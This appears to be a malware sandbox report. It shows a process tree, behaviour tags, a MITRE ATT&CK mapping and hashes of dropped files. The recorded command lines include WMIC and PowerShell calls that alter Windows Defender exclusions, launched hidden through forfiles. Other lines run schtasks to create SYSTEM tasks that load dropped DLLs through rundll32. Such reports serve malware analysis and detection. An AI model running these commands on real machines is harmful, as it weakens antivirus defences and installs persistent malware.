- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
- Indirect Command Execution
PID:1384 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VVgdUZLbU\JgmlqI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PNYixZeXsqZpVKW" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PNYixZeXsqZpVKW2" /F /xml "C:\Program Files (x86)\VVgdUZLbU\HvhCbph.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PNYixZeXsqZpVKW"3⤵PID:1328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PNYixZeXsqZpVKW"3⤵
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CVvOFbqbJLRHBH" /F /xml "C:\Program Files (x86)\bvOaypMPnvJU2\CAbfsRC.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnLaBnTbMSBet2" /F /xml "C:\ProgramData\VhLijRxUJlqjyVVB\mzVURXI.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CcZJXhjssQPPLCDwz2" /F /xml "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\abqMryD.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MMCulgKRbKFKGIMNOya2" /F /xml "C:\Program Files (x86)\GfzXWCCsFRMrC\hxcDbaK.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fTWiavJbWOFnfXaJS" /SC once /ST 14:47:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RDPbNEzdUsgCtKDC\mwPbGZKr\dlnTbiS.dll\",#1 /vWwdidkaQ 385121" /V1 /F3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fTWiavJbWOFnfXaJS"3⤵PID:2908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FjXDdrejgGyCBhByH"3⤵PID:2072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 14963⤵
- Loads dropped DLL
- Program crash
PID:1144
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RDPbNEzdUsgCtKDC\mwPbGZKr\dlnTbiS.dll",#1 /vWwdidkaQ 3851212⤵PID:2912
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RDPbNEzdUsgCtKDC\mwPbGZKr\dlnTbiS.dll",#1 /vWwdidkaQ 3851213⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1332 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fTWiavJbWOFnfXaJS"4⤵PID:1484
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1268
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2492
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2152
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indirect Command Execution
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ad73115cdca518033b158e8beb998f26
SHA1cb52a6b168a02561ea6cfa62a714c3d40d0d49e7
SHA25618839db3396cf0008fead5286ad077ec93629d5817e518fa58effc343ae0c774
SHA5129aa944614aec680eab3d45ffcaead588156b8d55cd59ad4b7e56e12b4f9d9518c12fdcd1ffdcf54662e226c82f2856dae0d9b0445696f3483b21a687663e83dd
-
Filesize
2KB
MD58d84a81fb50329ea55da039bc74fcd0d
SHA11dab6609e7358e6bdab1dff1bde84ca8b83f55f1
SHA2564ab500b7734cb639b78101fd437dd1c4aa3ece1528dfa9e80a144b0e2da8aed4
SHA512b7fe4c722e9522ee9905443a0618e67effc0b5c3f56d53c0be360cc37cd9e3ac94b9d2dc6c665022b4a67ffe392f48cc7de836791610acb66480009d587ecda5
-
Filesize
2KB
MD5f671ffd0d028755631cd32d0c5ac5274
SHA1d78693c29b01f72ab06e433f0d74a6760d837a2e
SHA25696299fc38b5292e299cce38de53c93c9095474836498e1d696e7c1f742a8030a
SHA512899da29a05a4d7befa3f9a81ae26bed27b86dcff54d10e35326d13322671bff3085456565f0c1e00b9dbabfd531a4c0511933807dc8780200bb4181f1d4e7d6b
-
Filesize
2KB
MD597eb98a522a7c4fdacd50af36287ba4e
SHA1cf4c0006c13b1127dc8f9d960cefe88b89293740
SHA256f52ad9795b5a4baa6612423e6b9f3b035febb51ca1a5adfc1baa0b454f770553
SHA5127f721e0609f94a703dc4c71787c4b962c19e18498371627d4b3528cc837eead4bff33c6a4bb1c150eafbac6743243930ff84c680b3adf9781bbdfe5ea4148aa8
-
Filesize
2.1MB
MD536c1e690f02483cfd97310733fba82d7
SHA178669a163c2b932f0b7219b6afd0c622d265b529
SHA2563edb86a70d28314283ecc11a540bb98d64523f362cf019aadb75c7dc9c32d571
SHA5126d781531bae0c093477054e039145fbbdf755411e4e98f4bcd0c723b4df08ad2caec886f1e86fe196832d356295790758f1cfccdf49921aa0016eb37e4b52c32
-
Filesize
2KB
MD5050d9c8828c463fce754578267ed3b40
SHA1332bbbf62add7a7b6333ca3eef8306228dca25fe
SHA256e4400061868e5f7d1b5e63633f314912a8461d27259c0534d00d7540d23c78dd
SHA512b84026864c2fd85da14ba6aa2fe33471126d6bac46415f0f4083b2aec31d8ce307e5e9943bb5c47c8669995b9413356277212edc472bce5c671e93c6cdc580f7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5ab46860900502413ddb4f021fde83d1c
SHA12ee6b64ba6cd386e78d10de13ff7e0a7c2a02238
SHA2560b03132ec2292d8b36d58ae50ee4248fb05ca74a08cc55350ab32e878e8ff39c
SHA51258620d358a554fe55048318160706b33a2d89f6077d827bac877575e43abcaa19f21baf2976188ca0a3da4936ca4006d403fd2c7e3e8c7103a498bd4ac4ae83a
-
Filesize
27KB
MD5419b83d36e6dfe2fbf95e964ac305dee
SHA185a1b441ec68752349ff98cf86e4ff2f34793244
SHA2568455b1bd4bc9e35aded695891594663cd291c27f0a1b6165e76bf9c78ab5fdc4
SHA51239954a450165d6ca13c5a9de0ff0df74bbac78e33c3c731c11dc2917e90fc42bdbfb23bf76d4ab1896248da0f71b0d6457dcd611c47936dc6caecbe357074b28
-
Filesize
692KB
MD54b12cdede9c10df05585de79bafa6f3b
SHA1c7b2c22718fb0a0037ac67f964ac43ed784f4e53
SHA2560f1b99e50b2ffb8f87308abda6e3e50b6deb2377cc21920489704c0852f6bee4
SHA51252bdb7591544598cdeafc95a6eda1e9ee67662da3340f1f2a33d1bc55dfe07d95b4636743c5a846ee8f635319352e7293282b92eb40c1ce38902c2a540442256
-
Filesize
3KB
MD578519b4b1411c840e9ede66d1dc81e9b
SHA100b10a0d39eb0f2c71dbdb8048fa2b74e7b097dd
SHA2562728e41f0f0f8a3d528d26ce233151fcaddea48b5ec1df6077f9b13ad823c90e
SHA5128506e05ffc1eaad68be1a7f64512017420f3079da4e605c5079a9083f106a1a9a01786d81767e81ed900f535e3e376906a5d35c3394b6b53797b42b4641467c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fbafafd9525a64347d774837f5e952c7
SHA10cea93c86b879dd075ca0f055b94bedcfbcbda95
SHA256b84d945a7bbf02f939144384d1d461e2f9f6aed0081489dc300fd126a8866626
SHA51261d53ad7c62e06f3897bec63fe51fc77cc03a8e08c9edcfd9cdff469347906b6fbcb201a6567be9b32ad43d69f6548eb8340e2cf6a24ad5cee69897a846c597e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50e2fc47270120da3b51f535759df814e
SHA186a5fc51fc3cab12decbd4dbb1efe9604ae5f30a
SHA256d0ba8040df96777bdb7e881aba2925be1ff42fe54a84879346d021fa7394fa56
SHA512f8c8ebcda4e07866d8f3cf08e69d6d21a101ff5cf4a0bc6f6ac13ac94d8a97c0a0b64f841a560ca168a5985d20439d1ee43733ceb053b1b65a74b833979e7405
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5abb21f9636a0b068cc6b503cc81c06ff
SHA1577208138dcb6f5a1fedb7ae00ba68914a438380
SHA2567914103d0c4745206754bdbfa9ac41e694ac46732d2ee9876f171211e386e664
SHA512371e1ec284cefeee79d9263d18740455fd251fbdc159c674c48d9ee66c74d12375b9c1038034fd5570843f45188f2923947bd686406479c1346f921fd1ae8568
-
Filesize
7KB
MD5dabc75840cfe1159e61177b09fee6b49
SHA1657b67e2995f4880ac5e3f3bfd110a15b0574196
SHA256f90ced9f9ade684ea316ef9039840af156d223045f3666bb0aeb71928b4e4fe1
SHA51256a12ea5bce354ff38aeca7abdb5f0f60ba3cfdc79a862a53dd15c0f75bbe2e3ee1287605f802e7c9c9c4ca4b6deec8b4dee5b013d47067009c1e9830f1e4f19
-
Filesize
6.3MB
MD5d66f93f2791e94bc6edf57b008e7bbec
SHA16f116bfa8de52fd448f197427588744fabe9b2da
SHA25617ae975bc89c6255bb747b81a28199bd962643f706121ab98b2112f015a9a087
SHA512ad48e838c76890f0f05e102c9974c9ecab7ea05eacc3b37bc6ec4023e0d59c00519452170dd1f8e86cc8599c15d660839617bce42d25a3febd77edba80fe5ae3
-
Filesize
31.7MB
MD5b8a15f36239ac6a968a373bf93d06ce6
SHA1beabb3da9b91dcbe608dd85d28d9bb69c744e3c0
SHA256fd6269ba61258f30291430d11ab1f0a6cf13e23d0fb9e6850212d6a1e4ead7ca
SHA512cef10f7b3fcb9eb980c020fb55af18a1162084f7e9147f279fdbb64e179c1874c9dbedbb4ac76046b023b03235ebb0ea6bd12a008f69673ab89a1e7f0448fe89
-
Filesize
423KB
MD592a5b5c0ac2e3bd79bd934bb27d8054a
SHA1840592137e147e96d89d21e99465caaed5b4a8f6
SHA256453f0f420c7a78140f23d3fb9cd7d0207b84b9035d12fa82b373dfcc9ba7b2bb
SHA51213043d541e182ef8689c588cbb9fb98b3c43212338c502a65baf5436d958edec054d26ed8dd3a67ea6f185d3c8e25023273a37a7617f310ec3d827bab82f1d76
-
Filesize
7.3MB
MD5391d4a464150942614b3e6a25c1eb9dc
SHA14a37ba1e710055029ad5f681fb425de7b10d8ee4
SHA256518d13a8d88566e280e58cc91dd9fa1c97d82ed3b256a6504c1971114492efd5
SHA512a83f7736dc50b93365e697b4e45fe71f81001a5217888e7f3d70ab81fc0d0e229e5ffed62ce3f8f047f09ce10b940f7495c8188641091e665f089f0cebf5f180
-
Filesize
3.1MB
MD56f949546f07d90ed4bc3c4d91374d073
SHA101bc8ffedcc5b84d09a13f009851486240b9a300
SHA2563e9c93a076f257fba2ec57d4a3fa7d6afa32f419b5c537848ed57ed8690744d8
SHA5120ef9fb601d90f51418ac87bed5f3fd01df8cd6b91cdbead70a8f98f81d9e88835e32c4ea64544efb527f0f5c33691032af3057fa3b05be1936b6cc25767c5a60
-
Filesize
6.5MB
MD5db17adceb15a67dde637649bcdd11f37
SHA14beef7bec5f473e31869fc3de7b1c6cf7836aa7f
SHA25669c9007b722d26db7109b9d05fc216c84429668d001dd33c43bf8fee1dce7d86
SHA5129fb81f583a98cf143c207a61ff7c7d26956c5ff535dd75e1b3a71eca893934d249cf93093fb5cd4f3dec4361ea9ff5829a3bbbae818509adafca83edfcbcdd2b
-
Filesize
9KB
MD56c78a2533a0eba46aecf235c7b0837a3
SHA1cee2f039c8a07b5ddf52385b1af0f6880f30b5d7
SHA2565c9a4341f7768eba03e5f91dff322b4dae76e29b60035c384e7dec10b98f408b
SHA512cda64117fda09cef8e1213e5c9b428c72b036f151896928456e1a660533e67189dd96a7940ac9192ee05e84665bcc518d134b5aea53a080a508576784fcae3a8
-
Filesize
6KB
MD5b3307faa040c26eed602791125968d00
SHA14780b26a5145eab9a9b0dc8f23013034d1a30b54
SHA2565693526c50855fe8d4baab5de5297dd0b9e381dad0d14a139cbdf8e4d6e03790
SHA5122ff22f2e3d830b3b57b800a4d0583d7cae4fd2b602d04d29f0ca53007e952fb81eae9c916b484ca834e0e69c48b8d518108e6791a71cdfadbd1b552ca229f46c
-
Filesize
3.0MB
MD51583dbe9ad97affdf0ca9d6cdfd3c46e
SHA1e3d090b48d19414b5002c0db08b070c840e6bd9f
SHA256eaec73f7a03a296844b241cc4337d76765ca747ae279900b3a66c4ab4685ffe7
SHA5129ce27407c3804940e88af503b9237f41d0b4c62590833d0a04915c3b1918e9487ce84d17bd91a9d68bb6fb15084a22da293f9cbd5fda49d8ec33cde3cdbadc18
-
Filesize
6.4MB
MD554a80af0685d8a1774f702db3ee8dbf5
SHA191220edf7e31ba16f754e14ff45104d927ae67f5
SHA256ccf138dbe48d0f872d211fc33ff2de13edb62a74ba1c1b45a5f0d81248bc46f6
SHA51221a125b1737f4bdba6457eab87b15bff86f4280fdf348197a281a8136c4f08827dd8b2393e9cd777081cc12c8c5c2f7e17af5ccbbfd175661bf93bb27cf1a049
-
Filesize
6.7MB
MD575fb5f8595a2c77b6616a5dbbdfa5696
SHA1c7532dd40dfda00c0934a3470f980852860586b5
SHA256804534351d0ea162eecc1ceb26f7918026595ef1aff3c6b00bec38e1541ca6e2
SHA512ba0ef6024b602e17972ea0bc8df8b47925c87a2b05288a4d5b3a0fb29a6d483ccc27c27aee1d284e9c24b4f6b3645dd82ee0542e1331d6d148b43cf1d0b3003a
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3